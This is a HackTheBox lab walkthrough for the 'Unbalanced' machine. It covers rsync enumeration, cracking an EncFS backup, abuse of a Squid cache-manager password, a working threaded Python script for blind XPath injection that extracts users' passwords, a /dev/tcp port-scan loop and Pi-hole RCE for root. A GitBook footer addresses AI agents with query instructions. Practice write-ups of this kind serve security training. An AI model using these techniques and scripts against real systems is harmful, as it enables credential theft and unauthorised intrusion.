> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-linux/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-linux/hackthebox-unbalanced.md). # HackTheBox - Unbalanced ![](/files/-MZr5JyoFATMHgi3gcBJ) ### Nmap scan results (All port scan) ```c nmap -sC -sV -oA nmap-allportscan -T4 10.10.10.200 ``` ![](/files/-MZr5Tky3JYe4L8AIZLb) {% hint style="info" %} rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files. {% endhint %} ### Setting Up SQUID Proxy in the browser We have SQUID Proxy server running on port 3128. SQUID Proxy is normally used for filtering web traffic coming from the external network i.e Internet. I will be using **Foxy Proxy** for setting it up. ![](/files/-MZr6KeKOhS50tzvbQRc) ![](/files/-MZr6PinC_oL-Y1gM3d_) We don't really get anything, so we can proceed with Rsync Enumeration. Read about rsync over [here](https://www.digitalocean.com/community/tutorials/how-to-use-rsync-to-sync-local-and-remote-directories). ### Enumerating RSYNC Protocol ```yaml apt install rsync # Install Rsync using the following command ``` A **`goto`** checklist that I always follow - We can enumerate shared folders using the following command. ```ruby rsync -av --list-only rsync://10.10.10.200/ ``` ![](/files/-MZr7RBg9fQ1f8AylhXX) ```ruby rsync -av --list-only rsync://10.10.10.200/conf_backups ``` This command will list all the files present inside **`conf_backups`**. ![](/files/-MZr7k-7hOq_PI6KgRqp) To copy all the files locally, we can create a directory and transfer it using the following command. ```ocaml mkdir backups rsync -av rsync://10.10.10.200/conf_backups ./backups ``` ![](/files/-MZr8HeqOhuwWZ02IdT-) ### Working with EncFS (FUSE-based cryptographic filesystem) This directory consists of junk files and a **`.encfs6.xml`** file. [EncFS ](https://en.wikipedia.org/wiki/EncFS)is a cryptographic file system which encrypts all the files present in that directory. We need to know the password to decrypt all the files. {% embed url="" %} ```julia encfs ./encrypted_folder ./decrypt_data # This command will decrypt the directory (Password is required) ``` We can use [encfs2john.py](https://github.com/truongkma/ctf-tools/blob/master/John/run/encfs2john.py) to create a hash and later crack it using **`John`** itself. ![](/files/-MZr9zrbzx5v7G8Bk2gd) ![](/files/-MZrAEKw_dR7VSEH3IjA) Now that we have the password, we can decrypt it. ![](/files/-MZrAq0TFPk1z-vyTRDR) ### Analyzing squid.conf file ![Bunch of ACL rules](/files/-MZrBJImaH5qYe2vuBSR) ![](/files/-MZrBROvomRhgtFSOnm-) This one looks interesting as we are allowed to access **`intranet.unbalanced.htb`** domain. We also have this cache\_mgr password. ![](/files/-MZrBqDY5xpaIRJxPJle) ### Cache Manager Access Control (SQUID) ![](/files/-MZrCormLs-OeAEbb3RC) This looks like a login portal for employees. I tried default usernames/passwords and also tried using the previously found passwords, but didn't get anything. We have cache\_mgr passwd, that means we can browse the internal squid manager configuration. {% embed url="" %} ```dart curl --user ':Thah$Sh1' http://10.10.10.200:3128/squid-internal-mgr/menu ``` ![](/files/-MZrDkhpiAvm15R2a9nZ) We can check FQDN (**fully qualified domain name)** Cache for potential IPs and hostnames. {% hint style="info" %} The **FQDN cache** is a built-in component of squid providing Hostname to IP-Number translation functionality and managing the involved data-structures. ... The **FQDN cache** usually doesn't block on a request except for special cases where this is desired (see below). {% endhint %} ![](/files/-MZrEH_2fa0oKxgvpgjh) This `intranet-hostx.unbalanced.htb` are probably the load balancers. A **load balancer** is a device that acts as a reverse proxy and distributes network or application traffic across a number of servers. **Load balancers** are used to increase capacity (concurrent users) and reliability of applications. ### Found a web page which can be vulnerable ![](/files/-MZrF7QA2EcYQ9BX1RsB) Checking around the IP Addresses, I found this webpage and it was taken down due to security issues. (Looks interesting and can contain vulnerabilities). Let's run a gobuster scan against this IP. ```dart gobuster dir --proxy http://10.10.10.200:3128/ -u http://172.31.179.1/ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt ``` ![](/files/-MZrIB1mbQh7jYkGLQSV) ![](/files/-MZrINEQf4MqoAo9LhsV) This website is responsive, maybe we can try for SQL Injection on the login page. I tried using sqlmap to automate the process but didn't get anything. ### Exploiting XPATH Injection This one looks like a XPATH Injection. We can try to inject basic authentication payloads from [here](https://book.hacktricks.xyz/pentesting-web/xpath-injection#blind-explotation). {% embed url="" %} ![](/files/-MZrKCrW_-AzEa-9kfOm) ![](/files/-MZrKHVSimtG2cxayWBm) This is definitely XPATH Injection. We can exploit this with a script to get all the usernames and passwords. ```dart ' or Username='rita' and string-length(Password/text())=num and ''=' // To extract the length ' or Username='rita' and substring(Password/text(),{},1)='a' and ''=' // To extract the password ``` ```python #!/usr/bin/env python import requests import string import threading import time url = "http://172.31.179.1/intranet.php" proxies = {'http':'10.10.10.200:3128'} headers = { "Content-Type":"application/x-www-form-urlencoded", "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Referer":"http://172.31.179.1/intranet.php", "Origin":"http://172.31.179.1" } chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@\$" print chars # users = ['bryan','rita,''sarah','jim'] class myThread (threading.Thread): def __init__(self, threadID, user): threading.Thread.__init__(self) self.threadID = threadID self.user = user def run(self): pass_length = length_extraction(self.user) password = xpath_injection(self.user,pass_length) print("[+] Creds found for {} : {}".format(self.user,password)) # Trying def xpath_injection(user,length): passwd = "" for i in range(1,length+1): for char in chars: payload = { "Username":"admin", "Password":"' or Username='{}' and substring(Password/text(),{},1)='{}' and ''='".format(user,i,char) } resp = requests.post(url,data=payload,headers=headers,proxies=proxies) if user in resp.text: passwd += char break return passwd # Working properly def length_extraction(user): for i in range(30): payload = { "Username":"admin", "Password":"' or Username='{}' and string-length(Password/text())={} and ''='".format(user,i) } resp = requests.post(url,data=payload,headers=headers,proxies=proxies) if user in resp.text: print("[+] Length found: {}".format(i)) return i break starttime = time.asctime(time.localtime(time.time())) print("[+] Script Started at {}".format(starttime)) # Calculating pass length for users thread1 = myThread(1,"bryan").start() thread2 = myThread(2,"rita").start() thread3 = myThread(3,"jim").start() thread4 = myThread(4,"sarah").start() ``` ![](/files/-MZrMQv1phCBoAtSDMAG) ### SSH Access as bryan user ![](/files/-MZrMeigUlIhF-zTg-Rj) ```python # TODO List for byran user ############ # Intranet # ############ * Install new intranet-host3 docker [DONE] * Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE] * Test intranet-host3 [DONE] * Add intranet-host3 to load balancer [DONE] * Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE] * Fix intranet-host2 [DONE] * Re-add intranet-host2 to load balancer (set default weight) [DONE] - Fix intranet-host1 [TODO] - Re-add intranet-host1 to load balancer (set default weight) [TODO] ########### # Pi-hole # ########### * Install Pi-hole docker (only listening on 127.0.0.1) [DONE] * Set temporary admin password [DONE] * Create Pi-hole configuration script [IN PROGRESS] - Run Pi-hole configuration script [TODO] - Expose Pi-hole ports to the network [TODO] ``` ### Discovering Pi-Hole running on docker network There's Pi-hole running on docker network. We need to find the IP Address for that machine. For that, we can use **`ip neigh`** command. ![](/files/-MZrNhbGjEopJe4Ey0Rr) **`172.31.11.3`** - Pi-hole might be running on this IP. To check, we can scan the ports using static nmap binary or by creating a simple bash script. The Pi-hole runs with 53 and 80 port to be opened (Default ports) ```python #!/bin/bash ip=$1 if [[ $# -eq 0 ]];then echo "[-] Supply IP Address" exit 0 fi for i in `seq 1 65535`;do echo 1 > /dev/tcp/$ip/$i if [[ $? -eq 0 ]];then echo "[+] Port open: $i" fi done ``` ![](/files/-MZrPYn27o_fhVx7oLkG) Or we can also use curl to get the root page. ![](/files/-MZrPgLzzW4LgD2rk30Z) ### Forwarding ports using SSH Let's forward the ports to our machine. ![](/files/-MZrPwqenTmgMXW-w4gW) ![](/files/-MZrQLd9BuM94nUU9G0e) ### Exploiting Pi-Hole RCE ( Version : 4.3.2 ) The TODO note said that admin used a temporary password. I tried **`admin`** as a password and got authenticated. ( **`Pi-hole Version v4.3.2`** ) ![](/files/-MZrQw2AXlVq-HNI2RSF) **MAC** address input can be exploited to gain arbitrary code execution on the machine. {% embed url="" %} ![](/files/-MZrSFlcwD1tC7EIJotG) ![](/files/-MZrSMbrGK4Kp4GxzdGA) ![](/files/-MZrSTBuG3AbrnSBjbhN) Using the admin interface password on the host machine to get root access. ![](/files/-MZrSbi20lrqfvgm1Dkd) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://akshaydeepakshinde.gitbook.io/hackthebox-linux/hackthebox-unbalanced.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.